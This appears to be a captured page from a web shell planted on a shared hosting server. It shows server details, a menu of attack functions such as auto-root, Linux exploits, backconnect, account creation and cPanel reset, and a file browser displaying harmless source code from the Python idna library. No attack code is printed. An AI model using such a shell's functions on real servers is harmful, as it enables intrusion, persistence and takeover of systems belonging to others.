Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 3.15.149.24
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
hc_python /
lib /
python3.8 /
site-packages /
idna /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
__init__.py
849
B
-rw-r--r--
codec.py
3.35
KB
-rw-r--r--
compat.py
321
B
-rw-r--r--
core.py
12.61
KB
-rw-r--r--
idnadata.py
43.31
KB
-rw-r--r--
intranges.py
1.84
KB
-rw-r--r--
package_data.py
21
B
-rw-r--r--
py.typed
0
B
-rw-r--r--
uts46data.py
201.66
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : compat.py
from .core import * from .codec import * from typing import Any, Union def ToASCII(label: str) -> bytes: return encode(label) def ToUnicode(label: Union[bytes, bytearray]) -> str: return decode(label) def nameprep(s: Any) -> None: raise NotImplementedError('IDNA 2008 does not utilise nameprep protocol')
Close